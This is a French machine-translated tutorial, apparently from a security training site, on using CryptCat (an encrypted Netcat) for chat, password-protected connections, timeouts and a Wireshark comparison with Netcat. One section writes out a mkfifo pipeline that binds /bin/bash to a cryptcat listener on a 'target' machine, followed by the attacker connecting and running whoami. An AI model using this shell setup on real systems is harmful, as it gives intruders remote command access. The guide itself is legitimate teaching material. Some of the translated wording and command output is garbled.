0% ont trouvé ce document utile (0 vote)
3 vues9 pages

Introduction à CryptCat et ses fonctionnalités

yo

Transféré par

yann67643
Copyright
© All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd
0% ont trouvé ce document utile (0 vote)
3 vues9 pages

Introduction à CryptCat et ses fonctionnalités

yo

Transféré par

yann67643
Copyright
© All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd

Traduit de Anglais vers Français - [Link].

com
Contenu
Introduction.......................................................................................3
Discussion ................................................................................................3
Mode verbeux ............................................................ ......................................4

Protéger avec un mot de passe ................................................................5

Coque inversée.......................................................................................5
Randomiser le port .................................................................................6
Intervalle de temporisation et de retard .................................................................6

Comparaison de Netcat et CryptCat .............................................................................7

Netcat :................................................. ..................................................7


Cryptcat : ............................................................................................8

Page2de8
Introduction
CryptCat est un outil standard amélioré par NetCat avec cryptage bidirectionnel. Il s'agit de l'outil utilitaire Unix le
plus simple qui lit et écrit des données sur des connexions réseau. Il peut utiliser le protocole TCP ou UDP tout en
cryptant les données transmises sur le réseau. Il s'agit d'un outil back-end fiable qui est facilement piloté par d'autres
programmes et scripts. Il est considéré comme un outil de débogage et d'exploration de réseau.

CryptCat peut agir comme un client ou un serveur TCP/UDP lorsqu'il est connecté au socket ou lorsqu'il agit comme un
auditeur du socket. Il peut prendre un mot de passe et ajouter un sel pour crypter les données envoyées via les connexions.
Sans fournir de mot de passe spécifié, il prendra le mot de passe par défaut, c'est-à-dire,""Métallique".

Nous pouvons étudier son fonctionnement et son application en examinant les options disponibles.

cryptcat -h

Chat
CryptCat peut être utilisé pour discuter entre deux utilisateurs. Nous devons établir une connexion stable avant le
chat. Pour ce faire, nous avons besoin de deux systèmes. De ces deux systèmes, l'un sera un auditeur et l'autre sera
un initiateur. Ainsi, la communication peut se faire des deux côtés.

Ici, nous essayons de créer un scénario de chat entre deux utilisateurs avec des systèmes d'exploitation différents.

Utilisateur 1

Système d'exploitation :Kali Linux

Adresse IP:[Link]

Rôle:Auditeur

Pour lancer un écouteur dans Kali Linux, suivez cette commande pour créer un écouteur :

cryptcat -l -p 42

Page3de8
Utilisateur 2

Système d'exploitation :Ubuntu

Adresse IP:[Link]

Rôle:Initiateur

Pour créer un initiateur, nous fournirons simplement l'adresse IP du système sur lequel nous avons démarré l'écouteur
suivie de son numéro de port.

cryptcat [Link] 42

Mode verbeux
Dans CryptCat, le mode verbeux peut être lancé en utilisant le paramètre [-v]. Le mode verbeux est désormais conçu pour
générer des informations étendues à partir de nos actions. Nous allons essayer le mécanisme de chat ci-dessus avec le mode
verbeux. Nous pouvons voir que lorsque nous ajoutons [-v] à la commande CryptCat, elle affiche des informations sur le
processus et ses performances lors de la connexion.

Du côté de l'auditeur

cryptcat -lvp 42

Du côté de l'initiateur

cryptcat -v [Link] 42

Page4de8
Protéger avec un mot de passe
Dans CryptCat, nous pouvons protéger notre connexion pendant la conversation avec un mot de passe, et le mot de passe peut être
appliqué en utilisant le paramètre [-k]. Nous savons que CryptCat nous fournit un chiffrement de bout en bout, mais en utilisant le
paramètre [-k], nous pouvons fournir une couche de protection supplémentaire à notre connexion. Il est donc presque impossible de
déchiffrer notre connexion. Nous pouvons demander cette protection avec les commandes suivantes :

Du côté de l'auditeur, nous appliquons le paramètre [-k] avec le mot de passe.

cryptcat -k ignite -lvp 42

Du côté de l'initiateur, nous devons appliquer le même mot de passe appliqué par l'auditeur afin de pouvoir nous connecter
à une connexion.

cryptcat -v -k ignite [Link] 42

Coquille inversée

Un « shell inversé » est un type de shell dans lequel la machine cible communique avec la machine attaquante.
La machine attaquante reçoit la connexion via un port en fournissant un mot de passe. Pour activer l'écouteur
sur la machine cible pour obtenir le shell, utilisez la commande suivante :

mkfifo monfifo
cryptcat -k monsecret -l -p 3333 0<monfifo | /bin/bash 1>monfifo

Maintenant, du côté de l'attaquant, il nous suffit de nous connecter à la victime. Ensuite, nous pouvons nous authentifier
en obtenant son accès root ou à l'aide de la commande "whoami".

cryptcat -k monsecret [Link] 3333 qui


suis-je
je suis un

Page5de8
Randomiser le port
Si nous ne pouvons pas décider de notre numéro de port pour démarrer l'écouteur ou établir notre connexion CryptCat,
alors CryptCat a un paramètre [-r] spécial pour nous qui nous donne un port local aléatoire.

cryptcat -lv -r

Intervalle de temporisation et de retard


La plupart d'entre nous confondent ces termes. Un délai d'attente est censé être un temps pour terminer notre tâche ou notre
programme. Alors que l'intervalle de délai est l'intervalle de temps entre deux requêtes ou tâches individuelles. Ainsi, dans CryptCat,
nous avons un paramètre [-w] pour le délai d'attente et un paramètre [-i] pour l'intervalle de délai. Appliquez ces deux paramètres
individuels pour obtenir les résultats souhaités.

Du côté de l'auditeur, nous appliquons à la fois un délai d'attente et un intervalle de retard

cryptcat -v -w 30 -i 10 -l -p 8080

Au niveau de l'initiateur, nous appliquons uniquement un délai d'attente.

cryptcat -v -w 2 [Link] 8080

Page6de8
Comparaison de Netcat et CryptCat

Avant de comparer ces deux outils, nous devons en savoir plus sur Netcat, ou nc. Il s'agit d'un outil utilitaire qui utilise des
connexions TCP et UDP pour lire et écrire sur un réseau. Il peut être utilisé à la fois à des fins de sécurité et de piratage.

En cas de piratage, il peut être utilisé à l'aide de scripts, ce qui le rend assez fiable. Et si nous
devons parler de sécurité, cela nous aide à déboguer le réseau tout en y investissant. Si nous
voulons tout savoir sur Netcat.
Et en ce qui concerne CryptCat, il s'agit d'une version plus avancée de Netcat. Il nous fournit le cryptage
bidirectionnel qui rend notre connexion plus sécurisée. Nous comparons ces deux outils étonnants en nous
basant sur le cryptage de connexion de la fonction de chat en interceptant leur interface réseau à l'aide de
Wireshark.

Chat réseau :

Comme nous le savons, nous utilisons un écouteur et un initiateur pour démarrer cette connexion pour discuter. Parallèlement à
cela, nous avons initié Wireshark pour intercepter son interface réseau.

Du côté de l'auditeur, nous utilisons le paramètre [-l] pour l'écoute et le paramètre [-p] pour le numéro de port.

nc -l -p 3131

Du côté de l'initiateur, nous devons simplement fournir un numéro de port, ainsi que l'adresse IP des auditeurs.

nc [Link] 3131

Page7de8
Maintenant, nous devons vérifier si notre Wireshark a pu attraper quelque chose ou non. Comme nous pouvons le voir, nous
avons intercepté avec succès le réseau et pouvons voir cette conversation réseau.4

Cryptcat:
Dans CryptCat, nous savons déjà qu'il nous fournit un cryptage bidirectionnel, ce qui rend le réseau de connexion
plus sécurisé que Netcat. Mais nous devons également vérifier cela en interceptant sa conversation à l'aide de
Wireshark. Pour cette connexion, nous avions besoin d'un écouteur et d'un initiateur pour la connexion.

Sur le site de l'écouteur, nous utiliserons le paramètre [-p] pour le port et [-l] pour initialiser l'écouteur.

cryptcat -l -p 3131

Du côté de l'initiateur, nous devons simplement fournir l'adresse IP ainsi que le numéro de port des écouteurs.

cryptcat [Link] 3131

Vérifions maintenant si nous pouvons acquérir quelque chose ou non. Comme nous pouvons le voir, ce chat est en mode crypté.

C'est la principale différence entre Netcat et Cryptcat. L'un fournit un chiffrement sur son
réseau et l'autre non. Certains diront que CryptCat = chiffrement + Netcat.

Page8de8
REJOIGNEZ NOTRE
PROGRAMMES DE FORMATION

C I
UEZ I
CLIQ DÉBUTANT

Chasse aux bugs Sécurité du réseau


Piratage éthique Essentiel

Test d'intrusion réseau


Test d'intrusion sans fil

AVANCÉ

Burp Suite Pro Web Pro Ordinateur


Services-API Infrastructures VAPT Médecine légale

Test d'intrusion Android


Avancé FCT
Métasploit

EXPERT

Opération Red Team

Élévation des privilèges

APT - Tactiques d'attaque MITRE

Fenêtres
Attaque Active Directory

Linux
Évaluation de la sécurité MSSQL

[Link]

Vous aimerez peut-être aussi